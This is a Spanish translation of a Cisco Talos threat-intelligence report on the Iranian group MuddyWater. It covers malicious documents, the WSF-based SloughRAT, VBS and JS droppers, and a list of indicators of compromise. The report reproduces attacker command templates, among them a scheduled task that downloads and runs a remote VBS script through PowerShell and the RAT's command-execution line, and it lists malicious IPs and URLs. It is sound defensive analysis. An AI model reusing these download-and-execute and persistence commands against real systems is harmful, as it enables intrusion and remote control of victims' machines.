(*) Autores: Asheer Malhotra , Vitor Ventura e Arnaud Zobec

  • La empresa Cisco Talos ha observado nuevos ataques cibernéticos dirigidos a Turquía y otros países asiáticos que creemos que son de grupos que operan bajo el paraguas de MuddyWater de los grupos APT. El Comando Cibernético de EE. UU.  conectó recientemente a MuddyWater con el Ministerio de Inteligencia y Seguridad de Irán (MOIS).
  • Estas campañas utilizan principalmente documentos maliciosos (maldocs) para implementar descargadores y RAT implementados en varios lenguajes como PowerShell, Visual Basic y JavaScript.
  • Otra nueva campaña dirigida a la Península Arábiga despliega una RAT basada en FSM que llamamos «SloughRAT», identificada como un implante llamado «dosel» por CISA en su  declaración  publicada a fines de febrero.
  • Según una revisión de varias campañas de MuddyWater, evaluamos que la APT iraní es un conglomerado de múltiples equipos que operan de forma independiente, en lugar de un solo grupo de actores de amenazas.
  • El supergrupo MuddyWater está muy motivado y puede utilizar el acceso no autorizado para llevar a cabo espionaje,  robar propiedad intelectual  e implementar  ransomware  y malware destructivo en una empresa.

ADVERSARIO: MuddyWater
INDUSTRIA: Gobierno
PAÍSES OBJETIVO: Jordania , Irán (República Islámica de Irán) , Armenia , Perú , Pakistán
FAMILIAS DE MALWARE: MuddyWater ,  WSF ,  SloughRAT
ATT&CK IDS: T1059: intérprete de comandos y secuencias de comandos , T1134: manejo de tokens de acceso , T1566: phishing , T1547: ejecución de inicio automático al inicio o inicio de sesión , T1102: servicio web , T1047: instrumentación de administración de Windows , T1203: explotación para la ejecución del cliente

RESUMEN EJECUTIVO

La empresa de ciberseguridad Cisco Talos ha identificado varias campañas y herramientas perpetradas por el grupo MuddyWater APT, que se cree está afiliado a intereses iraníes. Se considera que estos actores de amenazas están extremadamente motivados y son persistentes cuando se trata de atacar a las víctimas en todo el mundo.

Talos detectó una  campaña de MuddyWater en enero dirigida a entidades turcas  que aprovecharon maldocs y cadenas de infección basadas en ejecutables para entregar malware de descarga en varias etapas basado en PowerShell. Este grupo ha utilizado previamente las mismas tácticas para apuntar a otros países asiáticos como Armenia y Pakistán.

En nuestros últimos hallazgos, descubrimos una nueva campaña dirigida a Turquía y la Península Arábiga con maldocs para entregar un troyano de acceso remoto (RAT) basado en Windows Script File (WSF) que llamamos «SloughRAT», según la alerta de CISA emitida en febrero 2022 sobre MuddyWater.

Este troyano, aunque ofuscado, es relativamente simple e intenta ejecutar código arbitrario y comandos recibidos de sus servidores de comando y control (C2).

Nuestra investigación también condujo al descubrimiento del uso de dos implantes adicionales basados ​​en secuencias de comandos: uno escrito en Visual Basic (VB) (a fines de 2021 – 2022) y otro en JavaScript (2019 – 2020), que también descarga y ejecuta comandos arbitrarios en el sistema de la víctima.

La variedad de señuelos y cargas útiles de MuddyWater, además de apuntar a muchas regiones geográficas diferentes, fortalece nuestra creciente hipótesis de que MuddyWater es un conglomerado de subgrupos en lugar de un solo actor. Estos subgrupos han hecho campaña contra una variedad de industrias tales como  gobiernos y ministerios nacionales y locales ,  universidades  y entidades privadas tales como  proveedores de telecomunicaciones . Si bien estos equipos parecen operar de forma independiente, todos están motivados por los mismos factores que se alinean con los objetivos de seguridad nacional iraní, incluidos el espionaje, el robo intelectual y las operaciones destructivas o perturbadoras basadas en las víctimas a las que apuntan.

Una variedad de campañas analizadas están marcadas por el desarrollo y uso de diferentes vectores de infección y herramientas para obtener acceso, establecer acceso a largo plazo, extraer información valiosa y monitorear sus objetivos. Los equipos de MuddyWater parecen compartir TTP, como lo demuestra la adopción incremental de varias técnicas a lo largo del tiempo en diferentes campañas de MuddyWater. Representamos esta progresión en un gráfico detallado en la primera sección principal de este blog.

MuddyWater, la Amenaza

MuddyWater, también conocido como «MERCURY» o «Static Kitten», es un grupo APT que el  Comando Cibernético de EE. UU.  asignó recientemente al Ministerio de Inteligencia y Seguridad de Irán (MOIS). Esta amenaza, activa desde al menos 2017 , realiza campañas frecuentes contra objetivos de alto valor en países de América del Norte, Europa y Asia. Las campañas de MuddyWater suelen pertenecer a una de las siguientes categorías:

  • Espionaje : recopilación de información sobre adversarios o socios regionales que pueden beneficiar a Irán al ayudar a promover sus intereses políticos, económicos o de seguridad nacional.
  • Robo de  propiedad intelectual: el robo de propiedad intelectual y otra información patentada puede beneficiar a Irán de varias maneras, incluida la ayuda a las empresas iraníes contra sus competidores, la influencia en las decisiones de política económica a nivel estatal o la información sobre los esfuerzos de investigación y diseño relacionados con el gobierno, entre otros. Estas campañas están dirigidas  a entidades privadas  y gubernamentales, como universidades, grupos de expertos, agencias federales y varios sectores verticales de la industria.
  • Ataques de ransomware : MuddyWater ya ha intentado implementar  ransomware como Thanos en las redes de las víctimas para destruir la evidencia de sus intrusiones o interrumpir las operaciones.

MuddyWater a menudo recurre al empleo de DNS para comunicarse con sus servidores C2, mientras que el contacto inicial con los servidores de alojamiento se realiza a través de HTTP. Sus cargas útiles iniciales a menudo usan secuencias de comandos de PowerShell, Visual Basic y JavaScript, junto con archivos LoLBins* y utilidades de conexión remota para ayudar en las primeras etapas de la infección.

  • Aclaración de Ciberprisma: LoLBins (Living Off the Land Binaries por su sigla en inglés) es una técnica que se basa en aprovecharse de archivos binarios propios del sistema para ocasionar un importante daño en un ataque, con una tasa de detección relativamente baja)

La Amenaza MuddyWater está probablemente compuesta por varios subgrupos

Evaluamos que MuddyWater es un conglomerado de equipos más pequeños, y cada equipo usa diferentes tácticas de orientación contra regiones específicas del mundo. Parecen compartir algunas técnicas a las que van incorporando mejoras y modificaciones según sea necesario. Este intercambio es posiblemente el resultado de que los contratistas se mueven de un equipo a otro, o del uso de los mismos contratistas operativos y desarrolladores en cada equipo. Esto último también explica por qué hemos visto indicadores simples como cadenas y marcas de agua únicas compartidas entre los grupos APT MuddyWater y Phosphorus (también conocidos como APT35 y Charming Kitten). Estos grupos están asignados a diferentes organizaciones estatales iraníes:  MOIS  e  IRGC , respectivamente.

Según la nueva información y una revisión de la actividad de amenazas y los TTP de MuddyWater, podemos vincular los ataques cubiertos  en nuestro blog MuddyWater de enero de 2022  con esta última campaña dirigida a Turquía y otros países asiáticos. El siguiente gráfico muestra la superposición de los TTP y la orientación regional en las diversas campañas de MuddyWater, lo que sugiere que estos ataques son grupos de actividades distintos pero relacionados. Si bien algunas campañas inicialmente parecían aprovechar nuevos TTP que parecían no estar relacionados con otras operaciones, más tarde descubrimos que, en cambio, demostraban un paradigma más amplio de intercambio de TTP típico de los equipos operativos coordinados.

Fuente: CISCO TALOS

Al rastrear la actividad de MuddyWater durante el año pasado, vemos que algunas de las técnicas compartidas parecen refinarse de una región a otra, lo que sugiere que los equipos eligen sus herramientas preferidas del arsenal, incluidas las cargas útiles finales. La línea de tiempo anterior también muestra el uso incremental de ciertas técnicas en diferentes campañas a lo largo del tiempo, lo que sugiere que las mismas son sometidas a evaluación y mejoras antes de implementarlas en operaciones futuras.

Las dos primeras técnicas que vemos implementadas y compartidas para operaciones futuras son tokens (identificadores) y un dropper* ejecutable. Observamos por primera vez el uso de tokens en abril 2021 en una campaña contra Pakistán a través de un dropper simple que descarga la herramienta de control remota «Connectwise». Más tarde, en junio, vemos el primer uso del dropper ejecutable contra Armenia. La carga o «payload» es un script de PowerShell que carga otro script de PowerShell que descarga y ejecuta una carga final también basada en PowerShell.

  • Aclaración de Ciberprisma: Un dropper​​ es un tipo de troyano que ha sido diseñado para «instalar» algún tipo de malware (virus, puertas traseras, etc.) en un sistema objetivo.

Las dos técnicas se combinaron a fines de agosto 2021 en una campaña dirigida a Pakistán, esta vez todavía utilizando tokens caseros. Más tarde, los actores pasaron a una implementación más profesional del token usando la infraestructura CanaryTokens. Se trata de un servicio legítimo que MuddyWater utiliza para que sus operaciones sean menos sospechosas. Estas técnicas se emplearon en una campaña de noviembre 2021 dirigida a Turquía. En estos ataques a Turquía, MuddyWater usó maldocs con tokens y los mismos droppers ejecutables vistos anteriormente en Armenia y Pakistán.

En marzo de 2021, observamos que MuddyWater usaba la  herramienta de tunelización inversa Ligolo en ataques a países de Medio Oriente. Esta táctica se reutilizó más tarde en diciembre 2021, junto con la introducción de un nuevo implante. A partir de diciembre 2021, vemos que MuddyWater usa una nueva RAT basada en FSM que llamamos «SloughRAT» para apuntar a países en la Península Arábiga, que se describe con más detalle más adelante. Durante nuestra investigación, descubrimos que se estaba implementando otra versión de SloughRAT contra entidades ubicadas en Jordania. Este ataque incluyó el despliegue de Ligolo, una táctica de MuddyWater también corroborada por Trend Micro en  marzo de 2021, luego del despliegue de SloughRAT.

Todos estos ataques muestran un patrón interesante: varios puntos en común en algunos artefactos de infección clave y TTP, al tiempo que mantienen suficientes distinciones operativas. Este patrón se puede dividir en las siguientes prácticas:

  • Introducir un TTP en una ubicación geográfica determinada y, generalmente en un lapso de dos o tres meses, se reutiliza en una geografía completamente diferente, junto con otros TTP probados tomados de campañas realizadas en otra ubicación geográfica.
  • La introducción de al menos un TTP completamente nuevo para las tácticas MuddyWater en casi todas las campañas geográficamente distintas.

Estas observaciones indican claramente que MuddyWater es un grupo de grupos, cada uno responsable de dirigir operaciones cibernéticas contra una geografía específica. Cada uno también es responsable de desarrollar nuevas técnicas de infección, mientras que al mismo tiempo toma prestado de un conjunto de TTP probados en campañas previamente separadas.

CAMPAÑAS

Fusión de campañas anteriores de MuddyWater

Anteriormente habíamos observado dos campañas con los mismos tipos de ejecutables de Windows: una dirigida a Turquía en noviembre 2021 y otra en junio 2021 dirigida a Armenia. Otra campaña ilustrada anteriormente usó ejecutables similares, esta vez para apuntar a Pakistán. Esta campaña implementó un descargador basado en PowerShell en el terminal para aceptar y ejecutar comandos PS1 adicionales desde el servidor C2.

Cebo malicioso que contiene una imagen borrosa del emblema del estado de Pakistán y hace referencia a un caso judicial.

Yendo más atrás, en abril de 2021, observamos otro caso de Muddywater apuntando a entidades en Pakistán, esta vez con un vector de infección basado en maldoc. El documento utilizado para atraer a la víctima simulaba ser parte de un caso judicial, como se muestra en la imagen de la derecha.

En este caso, sin embargo, los atacantes intentaron implementar el cliente Connectwise Remote Access en los endpoints* del objetivo, una táctica comúnmente utilizada por MuddyWater.

  • Aclaración de Ciberprisma: dispositivo informático remoto que se comunica con una red a la que está conectado

En los ataques que implementaron RAT en abril 2021 y el vector de infección basado en EXE de agosto 2021, los documentos maldoc y señuelo se pusieron en contacto con un servidor común para descargar un archivo de imagen común que los vincula.

Estas campañas utilizaron una implementación casera de tokens de señalización. En este caso, los maldocs tienen una entidad externa descargada de un servidor controlador-atacante. Esta entidad consiste en una simple imagen que no tiene contenido malicioso. Se utiliza la misma URL base en ambas campañas:

hxxp://172.245.81[.]135:10196/Geq5P3aFpaSrK3PZtErNgUsVCfqQ9kZ9/

Sin embargo, maldoc agrega una extensión de URL adicional:

«ef4f0d9af47d737076923cfccfe01ba7/layer.jpg» mientras que el señuelo agrega «/Pan-op/gallery.jpg».

Esta puede ser una forma de rastreo que utilicen los atacantes con su vector de infección inicial y determinar cuál tiene más éxito. Es muy probable que los atacantes hayan utilizado este servidor como rastreador de fichas para realizar un seguimiento de las infecciones exitosas en esta campaña. Este sistema de seguimiento de tokens se migró a CanaryTokens en septiembre 2021 en ataques dirigidos a Turquía utilizando documentos de Excel maliciosos.

Campaña de MuddyWater en Medio Oriente usando Maldocs — SloughRAT

Documento de Excel que descarta el archivo Outlook.wsf.

Durante un reciente compromiso de IR, Talos observó múltiples instancias de documentos maliciosos (maldocs), específicamente archivos XLS, distribuidos por MuddyWater. Se observó que estos archivos XLS apuntaban a la Península Arábiga a través de una campaña de phishing reciente.

El maldoc es una macro maliciosa que suelta dos archivos WSF en el punto final. Uno de ellos es el script destinado a ejecutar la siguiente etapa. La macro de VBA coloca este script en la carpeta de inicio del usuario actual para establecer la persistencia en los reinicios.

El segundo script es un archivo RAT (troyano de acceso remoto) basada en WSF que llamamos «SloughRAT» que puede ejecutar comandos arbitrarios en el punto final infectado. Este RAT consta de código Visual Basic ofuscado y JavaScript entrelazados.

Análisis del Script basado en FSM

A primera vista, el análisis del script parece complicado debido a la técnica de ofuscación. Sin embargo, en esencia, la secuencia de comandos está destinada únicamente a ejecutar la siguiente carga útil de RAT de WSF.

En tiempo de ejecución, el código elimina la ofuscación de dos componentes principales para pasar a la siguiente etapa:

  • Ruta al script RAT que está codificado pero ofuscado.
  • La clave real en la RAT que activa la llamada de código malicioso.

Estos datos se utilizan para realizar una llamada a la RAT basada en WSF:

cmd.exe /c <ruta_a_WSF_RAT> <clave>

Desofuscación de la persistencia.

ANÁLISIS DE «SLOUGHRAT«

El implante FSM tiene varias capacidades. La secuencia de comandos utiliza ofuscación de varias capas para ocultar su verdadera extensión. Las capturas de pantalla que se presentan a continuación son el resultado del análisis y presentan su apariencia desofuscada para una mejor comprensión.

El script RAT necesita un nombre de función como argumento para ejecutarse correctamente y realizar sus actividades maliciosas. Este nombre lo proporciona la secuencia de comandos del instrumento y puede ser un método para evitar el análisis dinámico automatizado, ya que enviar la secuencia de comandos RAT sola sin el nombre de la función como argumento hará que la muestra no se ejecute en un espacio aislado.

1. RECOGIDA DE INFORMACIÓN PRELIMINAR Y REGISTRO DE INFECCIONES

El script RAT comienza a ejecutarse realizando una consulta WMI para registrar la dirección IP del punto final infectado.

Desofuscación de características de descubrimiento.

Luego obtendrá el nombre de usuario y la computadora consultando las variables de entorno:

  • %NOMBRE DE LA COMPUTADORA%
  • %NOMBRE DE USUARIO%
Desofuscación de características de descubrimiento.

Esta información del sistema luego se concatena usando un delimitador y se codifica para registrar el sistema infectado con el servidor C2 codificado en el implante.

Formato:
<dirección_IP>|!)!)!|%NombreDeEquipo%/%NOMBRE DE USUARIO%

2. RECURSOS DEL TROYANO DE ACCESO REMOTO

Las características de este RAT son relativamente simples, además de las características de recopilación de información descritas anteriormente.

Una vez registrada la infección en el servidor C2, el implante recibirá un código de comando del servidor C2. El implante utiliza dos URL diferentes:

  • Uno se usa para registrar el implante y solicitar comandos arbitrarios de C2.
  • Otro que se utiliza para publicar los resultados de los comandos ejecutados en el punto final infectado.

La comunicación con C2 se realiza mediante el ServerXMLHTTP común de la API de MSXML2 para instrumentar una solicitud HTTP POST.

El tiempo entre cada solicitud es aleatorio, lo que hace que el malware sea más sigiloso y puede eludir algunos entornos limitados.

Desofuscación de la construcción de solicitudes HTTP.

Todos los datos enviados al servidor C2 están en forma de formularios HTTP acompañados de encabezados relevantes como:

  • Tipo de contenido
  • Extensión del contenido
  • Conjunto de caracteres.

Primero, el script envía la información del sistema a la primera URL C2, codificando el mensaje y enviándolo vía solicitud POST, dentro del parámetro “vl” usando el siguiente formato:

<dirección_IP>|!)!)!|%NombreDeEquipo% /%NOMBRE DE USUARIO%

Luego, el servidor devuelve un UID construido mediante la concatenación de la IP del servidor y un UUIDv4.

Por ejemplo, el UID 5-199-133-149-<UUIDv4> se almacena en una variable y envía mensajes de mantenimiento para solicitar comandos de C2.

Este UID luego se envía a través de los parámetros «vl» dentro de una solicitud HTTP POST a otra URL C2.

Cuando el servidor recibe este UID, devuelve un mensaje codificado que interpreta el script.

El mensaje podría ser:

  • «ok»: no hacer nada y enviar el UID de nuevo (como un keep-alive).
  • «401»: Esta orden borra la variable UID y obliga al script a solicitar otro UID, enviando una solicitud al primer URI.
  • Un comando a ejecutar que inicia la rutina de ejecución del comando.

Un comando recibido del servidor C2 se ejecutará utilizando la utilidad de línea de comandos. Su salida se escribe en un archivo temporal en el disco en una ubicación como «%TEMP%\stari.txt». Estos datos se leen inmediatamente y se envían a C2. El mensaje tendrá el siguiente formato:

<UID>|!)!)!|<resultado de la salida del comando>

Los comandos se ejecutan usando la línea de comando:

cmd.exe /c <comando_enviado_por_C2> >> <ruta_al_archivo_temporario>

Desofuscación de la rutina de ejecución de comandos.

Los atacantes usaron otra versión de SloughRAT, que no está tan ofuscada como la versión ilustrada anteriormente, esta vez dirigida a entidades en la Península Arábiga. La funcionalidad general utilizada en esta instancia es la misma con modificaciones menores a las rutas de archivo, delimitadores, etc.

WSF RAT versión #2: solo cambios menores.

Los atacantes utilizaron SloughRAT para implementar Ligolo , una herramienta de túnel inverso de código abierto para obtener un mayor grado de control sobre los endpoints infectados. Esta táctica observada está en sintonía con  los hallazgos anteriores de Trend Micro .

Cadena general de infección:

Fuente CISCO TALOS

Droppers basados ​​en VBS

En otro caso, observamos la implementación de droppers basados ​​en VBS maliciosos en diciembre 2021 y hasta enero 2022 a través de tareas programadas maliciosas configuradas por los atacantes. La tarea programada se vería así:

SchTasks /Create /SC ONCE /ST 00:01 /TN <nombre_tarea> /TR powershell -exec bypass -w 1 Invoke-WebRequest -Uri '<ubicación_URL_remota>' -OutFile <ruta_VBS_malicious_on_endpoint>;
wscript.exe <malicious_VBS_path_on_endpoint>

Estas tareas descargan y analizan el contenido del servidor C2 y lo ejecutan en el terminal infectado. La salida del comando se escribiría en un archivo temporal en el directorio %APPDATA% y luego se leería y filtraría a C2.

Actualmente se desconoce la cadena de infección completa de estos droppers basados ​​en VBS.

Descargador basado en VBS.

Campaña anterior que utiliza droppers basados ​​en JS

Una campaña anterior operada por MuddyWater a fines de noviembre de 2019 y 2020 usó maldocs y una cadena complicada de scripts ofuscados para implementar un dropper/programador basado en JavaScript en el endpoint infectado. Esta campaña también parece estar dirigida a usuarios turcos.

El maldoc contiene una macro que colocaría un VBS ofuscado malicioso en un directorio del sistema. Luego, las macros crearían persistencia para VBS a través de la clave de ejecución del registro del usuario actual. Este VBS es responsable de desofuscar las siguientes cargas útiles y ejecutarlas en el endpoint. Esta ejecución culminó con un dropper JS malicioso que se ejecutaba en el sistema para descargar y ejecutar comandos.

Descargador basado en JS.

CONCLUSIÓN

Cisco Talos ha observado durante años a grupos APT iraníes que llevan a cabo operaciones y actividades maliciosas en todo el mundo. Particularmente, 2021 fue prolífico en incidentes de seguridad cibernética para Irán donde las organizaciones estatales fueron atacadas. El régimen iraní culpó de estos hechos a las naciones occidentales, con la promesa de venganza. Es difícil decir si estas campañas son el resultado de tales promesas o simplemente parte de la actividad habitual de estos grupos. Sin embargo, el hecho de que hayan cambiado algunos de sus métodos de operación y herramientas es otra señal de su adaptabilidad y falta de voluntad para abstenerse de atacar a otras naciones.

Creemos que existen vínculos entre estas diferentes campañas, incluida la migración de técnicas de una región a otra, junto con su evolución a versiones más avanzadas. En general, las campañas que describimos cubren Turquía, Pakistán, Armenia y países de la Península Arábiga. Si bien comparten ciertas técnicas, estas campañas también denotan individualidad en la forma en que se llevaron a cabo, lo que indica la existencia de múltiples subequipos bajo el paraguas de Muddywater, todos compartiendo un conjunto de tácticas y herramientas para elegir.

Las estrategias de defensa en profundidad basadas en un enfoque de análisis de riesgos pueden proporcionar los mejores resultados en la protección contra un conjunto de amenazas tan motivados. Sin embargo, esto siempre debe complementarse con un buen plan de respuesta a incidentes que no solo se haya probado con ejercicios de simulación, sino que también se haya revisado y mejorado cada vez que se pruebe en compromisos reales.

IOCS – Indicadores de Compromiso


MALDOCS
4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
7de663524b63b865e57ffc3eb4a339e150258583fdee6c2c2ca4dd7b5ed9dfe7
6e50e65114131d6529e8a799ff660be0fc5e88ec882a116f5a60a2279883e9c4
ef385ed64f795e106d17c0a53dfb398f774a555a9e287714d327bf3987364c1b

FSM
d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418
c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e
f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
cc67e663f5f6cea8327e1323ecdb922ae8e48154bbf7bd3f9b2ee2374f61c5d6

EBV
fb69c821f14cb0d89d3df9eef2af2d87625f333535eb1552b0fcd1caba38281f

JS
202bf7a4317326b8d0b39f1fa19304c487128c8bd6e52893a6f06f9640e138e6
3fe9f94c09ee450ab24470a7bcd3d6194d8a375b3383f768662c1d561dab878d
cf9b1e0d17199f783ed2b863b0289e8f209600a37724a386b4482c2001146784

Gastos
a500e5ab8ce265d1dc8af1c00ea54a75b57ede933f64cea794f87ef1daf287a1

IP
185[.]118.164.195
5[.]199[.]133[.]149
88[.]119[.]170[.]124
185[.]183[.]97[.]25
95[.] 181,161,81
178[.]32[.]30[.]3

URL
hxxp://185[.]118.164.195/c
hxxp://5[.]199[.]133[.]149/oeajgyxyxclqmfqayv
hxxp://5[.]199[.]133[.]149/ jznkmustntblvmdvgcwbvqb
hxxp: // 88 119 170 124 / lcekcnkxkbllmwlpoklgof [.]
hxxp: // 88 119 170 124 / ezedcjrfvjriftmldedu [.]
hxxp: // 178 32.30.3 80 / kz10n2f9d5c4pkz10n2f9s2vhkz10n2f9 / gcvvPu2KXdqEbDpJQ33 / [.]
hxxp: // 178 [ .]32.30.3:80/kz10n2f9d5c4pkz10n2f9s2vhkz10n2f9/rrvvPu2KXdqEbDpJQ33/
hxxp://185[.]183.97.25/protocol/function.php
hxxp://lalindustries[.]com/wp-content/upgrade/editor.php
hxx : //advanceorthocenter[.]com/wp-includes/editor.php
hxxp://95[.]181.161.81/i100dfknzphd5k
hxxp://95[.]181.161.81/mm57aayn230
hxxp://95[.] 181.161 .81:443/principal.exe

Fuente: CISCO

Traducción al Castellano realizada por el Equipo CIBERPRISMA del Artículo Original en idioma portugués propiedad de DCiber de Brasil.